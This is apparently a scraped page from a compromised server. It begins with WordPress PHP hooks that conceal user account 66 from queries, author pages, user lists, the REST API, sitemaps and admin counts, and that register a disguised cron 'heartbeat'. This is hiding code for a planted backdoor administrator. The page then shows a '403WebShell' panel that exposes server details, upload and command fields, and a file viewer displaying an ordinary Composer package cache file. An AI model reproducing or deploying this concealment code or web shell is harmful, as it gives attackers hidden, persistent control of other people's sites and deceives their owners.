add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/.cache/composer/repo/https---repo.packagist.org/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/.cache/composer/repo/https---repo.packagist.org/provider-phpunit~php-timer.json
{"minified":"composer/2.0","packages":{"phpunit/php-timer":[{"name":"phpunit/php-timer","description":"Utility class for timing","keywords":["timer"],"homepage":"https://github.com/sebastianbergmann/php-timer/","version":"7.0.1","version_normalized":"7.0.1.0","license":["BSD-3-Clause"],"authors":[{"name":"Sebastian Bergmann","email":"sebastian@phpunit.de","role":"lead"}],"source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"3b415def83fbcb41f991d9ebf16ae4ad8b7837b3"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/3b415def83fbcb41f991d9ebf16ae4ad8b7837b3","type":"zip","shasum":"","reference":"3b415def83fbcb41f991d9ebf16ae4ad8b7837b3"},"type":"library","support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","security":"https://github.com/sebastianbergmann/php-timer/security/policy","source":"https://github.com/sebastianbergmann/php-timer/tree/7.0.1"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-07-03T05:09:35+00:00","autoload":{"classmap":["src/"]},"extra":{"branch-alias":{"dev-main":"7.0-dev"}},"require":{"php":">=8.2"},"require-dev":{"phpunit/phpunit":"^11.0"}},{"version":"7.0.0","version_normalized":"7.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"8a59d9e25720482ee7fcdf296595e08795b84dc5"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/8a59d9e25720482ee7fcdf296595e08795b84dc5","type":"zip","shasum":"","reference":"8a59d9e25720482ee7fcdf296595e08795b84dc5"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","security":"https://github.com/sebastianbergmann/php-timer/security/policy","source":"https://github.com/sebastianbergmann/php-timer/tree/7.0.0"},"time":"2024-02-02T06:08:01+00:00"},{"version":"6.0.0","version_normalized":"6.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"e2a2d67966e740530f4a3343fe2e030ffdc1161d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/e2a2d67966e740530f4a3343fe2e030ffdc1161d","type":"zip","shasum":"","reference":"e2a2d67966e740530f4a3343fe2e030ffdc1161d"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/6.0.0"},"time":"2023-02-03T06:57:52+00:00","extra":{"branch-alias":{"dev-main":"6.0-dev"}},"require":{"php":">=8.1"},"require-dev":{"phpunit/phpunit":"^10.0"}},{"version":"5.0.3","version_normalized":"5.0.3.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"5a63ce20ed1b5bf577850e2c4e87f4aa902afbd2"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/5a63ce20ed1b5bf577850e2c4e87f4aa902afbd2","type":"zip","shasum":"","reference":"5a63ce20ed1b5bf577850e2c4e87f4aa902afbd2"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/5.0.3"},"time":"2020-10-26T13:16:10+00:00","extra":{"branch-alias":{"dev-master":"5.0-dev"}},"require":{"php":">=7.3"},"require-dev":{"phpunit/phpunit":"^9.3"}},{"version":"5.0.2","version_normalized":"5.0.2.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"c9ff14f493699e2f6adee9fd06a0245b276643b7"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/c9ff14f493699e2f6adee9fd06a0245b276643b7","type":"zip","shasum":"","reference":"c9ff14f493699e2f6adee9fd06a0245b276643b7"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/5.0.2"},"time":"2020-09-28T06:00:25+00:00"},{"version":"5.0.1","version_normalized":"5.0.1.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"cc49734779cbb302bf51a44297dab8c4bbf941e7"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/cc49734779cbb302bf51a44297dab8c4bbf941e7","type":"zip","shasum":"","reference":"cc49734779cbb302bf51a44297dab8c4bbf941e7"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/master"},"time":"2020-06-26T11:58:13+00:00","require":{"php":"^7.3 || ^8.0"},"require-dev":{"phpunit/phpunit":"^9.2"}},{"version":"5.0.0","version_normalized":"5.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"b0d089de001ba60ffa3be36b23e1b8150d072238"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/b0d089de001ba60ffa3be36b23e1b8150d072238","type":"zip","shasum":"","reference":"b0d089de001ba60ffa3be36b23e1b8150d072238"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/5.0.0"},"time":"2020-06-07T12:05:53+00:00","require":{"php":"^7.3"}},{"version":"4.0.0","version_normalized":"4.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"d6359824fc9bd2a4f90383b224906a1884aa56ca"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/d6359824fc9bd2a4f90383b224906a1884aa56ca","type":"zip","shasum":"","reference":"d6359824fc9bd2a4f90383b224906a1884aa56ca"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/master"},"time":"2020-06-01T12:18:17+00:00","extra":{"branch-alias":{"dev-master":"4.0-dev"}}},{"version":"3.1.4","version_normalized":"3.1.4.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"dc9368fae6ef2ffa57eba80a7410bcef81df6258"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/dc9368fae6ef2ffa57eba80a7410bcef81df6258","type":"zip","shasum":"","reference":"dc9368fae6ef2ffa57eba80a7410bcef81df6258"},"time":"2020-04-20T06:00:37+00:00","extra":{"branch-alias":{"dev-master":"3.1-dev"}},"require-dev":{"phpunit/phpunit":"^9.0"}},{"version":"3.1.3","version_normalized":"3.1.3.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"845246404c66dc892a8e044d7d0f1cdb46650b00"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/845246404c66dc892a8e044d7d0f1cdb46650b00","type":"zip","shasum":"","reference":"845246404c66dc892a8e044d7d0f1cdb46650b00"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/3.1.3"},"time":"2020-04-20T05:28:36+00:00"},{"version":"3.1.2","version_normalized":"3.1.2.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"35e732ff964693cb91ef4690f1f6016833b68f9d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/35e732ff964693cb91ef4690f1f6016833b68f9d","type":"zip","shasum":"","reference":"35e732ff964693cb91ef4690f1f6016833b68f9d"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/master"},"time":"2020-04-17T15:08:36+00:00"},{"version":"3.1.1","version_normalized":"3.1.1.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"5fb3c5a73acbb1e19907bd37c15e686f468bf63d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/5fb3c5a73acbb1e19907bd37c15e686f468bf63d","type":"zip","shasum":"","reference":"5fb3c5a73acbb1e19907bd37c15e686f468bf63d"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/3.1.1"},"time":"2020-04-17T13:40:28+00:00"},{"version":"3.1.0","version_normalized":"3.1.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"7b620d643aabeb9d84f59b6fa9227b810cbea7af"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/7b620d643aabeb9d84f59b6fa9227b810cbea7af","type":"zip","shasum":"","reference":"7b620d643aabeb9d84f59b6fa9227b810cbea7af"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/3.1.0"},"time":"2020-04-17T11:33:08+00:00"},{"version":"3.0.0","version_normalized":"3.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"4118013a4d0f97356eae8e7fb2f6c6472575d1df"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/4118013a4d0f97356eae8e7fb2f6c6472575d1df","type":"zip","shasum":"","reference":"4118013a4d0f97356eae8e7fb2f6c6472575d1df"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/3.0.0"},"time":"2020-02-07T06:08:11+00:00","extra":{"branch-alias":{"dev-master":"3.0-dev"}},"funding":"__unset"},{"version":"2.1.4","version_normalized":"2.1.4.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"a691211e94ff39a34811abd521c31bd5b305b0bb"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/a691211e94ff39a34811abd521c31bd5b305b0bb","type":"zip","shasum":"","reference":"a691211e94ff39a34811abd521c31bd5b305b0bb"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/2.1.4"},"funding":[{"url":"https://github.com/sebastianbergmann","type":"github"}],"time":"2024-03-01T13:42:41+00:00","extra":{"branch-alias":{"dev-master":"2.1-dev"}},"require":{"php":">=7.1"},"require-dev":{"phpunit/phpunit":"^8.5"}},{"version":"2.1.3","version_normalized":"2.1.3.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"2454ae1765516d20c4ffe103d85a58a9a3bd5662"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/2454ae1765516d20c4ffe103d85a58a9a3bd5662","type":"zip","shasum":"","reference":"2454ae1765516d20c4ffe103d85a58a9a3bd5662"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/2.1.3"},"time":"2020-11-30T08:20:02+00:00"},{"version":"2.1.2","version_normalized":"2.1.2.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"1038454804406b0b5f5f520358e78c1c2f71501e"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/1038454804406b0b5f5f520358e78c1c2f71501e","type":"zip","shasum":"","reference":"1038454804406b0b5f5f520358e78c1c2f71501e"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/master"},"time":"2019-06-07T04:22:29+00:00","require":{"php":"^7.1"},"require-dev":{"phpunit/phpunit":"^7.0"},"funding":"__unset"},{"version":"2.1.1","version_normalized":"2.1.1.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"8b389aebe1b8b0578430bda0c7c95a829608e059"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/8b389aebe1b8b0578430bda0c7c95a829608e059","type":"zip","shasum":"","reference":"8b389aebe1b8b0578430bda0c7c95a829608e059"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/2.1.1"},"time":"2019-02-20T10:12:59+00:00"},{"version":"2.1.0","version_normalized":"2.1.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"0441cda74da9cec7ca4511f1ab853c309dd0f6ea"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/0441cda74da9cec7ca4511f1ab853c309dd0f6ea","type":"zip","shasum":"","reference":"0441cda74da9cec7ca4511f1ab853c309dd0f6ea"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/2.1.0"},"time":"2019-02-20T09:36:21+00:00"},{"version":"2.0.0","version_normalized":"2.0.0.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"8b8454ea6958c3dee38453d3bd571e023108c91f"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/8b8454ea6958c3dee38453d3bd571e023108c91f","type":"zip","shasum":"","reference":"8b8454ea6958c3dee38453d3bd571e023108c91f"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/2.0.0"},"time":"2018-02-01T13:07:23+00:00","extra":{"branch-alias":{"dev-master":"2.0-dev"}}},{"version":"1.0.9","version_normalized":"1.0.9.0","authors":[{"name":"Sebastian Bergmann","email":"sb@sebastian-bergmann.de","role":"lead"}],"source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"3dcf38ca72b158baf0bc245e9184d3fdffa9c46f"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/3dcf38ca72b158baf0bc245e9184d3fdffa9c46f","type":"zip","shasum":"","reference":"3dcf38ca72b158baf0bc245e9184d3fdffa9c46f"},"support":{"issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/master"},"time":"2017-02-26T11:10:40+00:00","extra":{"branch-alias":{"dev-master":"1.0-dev"}},"require":{"php":"^5.3.3 || ^7.0"},"require-dev":{"phpunit/phpunit":"^4.8.35 || ^5.7 || ^6.0"}},{"version":"1.0.8","version_normalized":"1.0.8.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"38e9124049cf1a164f1e4537caf19c99bf1eb260"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/38e9124049cf1a164f1e4537caf19c99bf1eb260","type":"zip","shasum":"","reference":"38e9124049cf1a164f1e4537caf19c99bf1eb260"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/master"},"time":"2016-05-12T18:03:57+00:00","require":{"php":">=5.3.3"},"require-dev":{"phpunit/phpunit":"~4|~5"},"extra":"__unset"},{"version":"1.0.7","version_normalized":"1.0.7.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"3e82f4e9fc92665fafd9157568e4dcb01d014e5b"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/3e82f4e9fc92665fafd9157568e4dcb01d014e5b","type":"zip","shasum":"","reference":"3e82f4e9fc92665fafd9157568e4dcb01d014e5b"},"time":"2015-06-21T08:01:12+00:00","require-dev":"__unset"},{"version":"1.0.6","version_normalized":"1.0.6.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"83fe1bdc5d47658b727595c14da140da92b3d66d"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/83fe1bdc5d47658b727595c14da140da92b3d66d","type":"zip","shasum":"","reference":"83fe1bdc5d47658b727595c14da140da92b3d66d"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/1.0.6"},"time":"2015-06-13T07:35:30+00:00"},{"version":"1.0.5","version_normalized":"1.0.5.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"19689d4354b295ee3d8c54b4f42c3efb69cbc17c"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/19689d4354b295ee3d8c54b4f42c3efb69cbc17c","type":"zip","shasum":"","reference":"19689d4354b295ee3d8c54b4f42c3efb69cbc17c"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/1.0.5"},"time":"2013-08-02T07:42:54+00:00","autoload":{"classmap":["PHP/"]},"include-path":[""]},{"homepage":"http://www.phpunit.de/","version":"1.0.4","version_normalized":"1.0.4.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"19fa03d75db7eb732db5256fe7f08a66116ace90"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/19fa03d75db7eb732db5256fe7f08a66116ace90","type":"zip","shasum":"","reference":"19fa03d75db7eb732db5256fe7f08a66116ace90"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/1.0.4"},"time":"2012-10-11T11:45:58+00:00"},{"version":"1.0.3","version_normalized":"1.0.3.0","source":{"url":"https://github.com/sebastianbergmann/php-timer.git","type":"git","reference":"5175e9bb35fc9cc430973ed83a3d62531c3c8698"},"dist":{"url":"https://api.github.com/repos/sebastianbergmann/php-timer/zipball/5175e9bb35fc9cc430973ed83a3d62531c3c8698","type":"zip","shasum":"","reference":"5175e9bb35fc9cc430973ed83a3d62531c3c8698"},"support":{"irc":"irc://irc.freenode.net/phpunit","issues":"https://github.com/sebastianbergmann/php-timer/issues","source":"https://github.com/sebastianbergmann/php-timer/tree/1.0.3"},"time":"2012-09-23T00:00:00+00:00","autoload":{"files":["PHP/Timer/Autoload.php"]},"require":{"php":">=5.2.7"}}]},"security-advisories":[],"last-modified":"Wed, 03 Jul 2024 05:09:51 GMT"}

Youez - 2016 - github.com/yon3zu
LinuXploit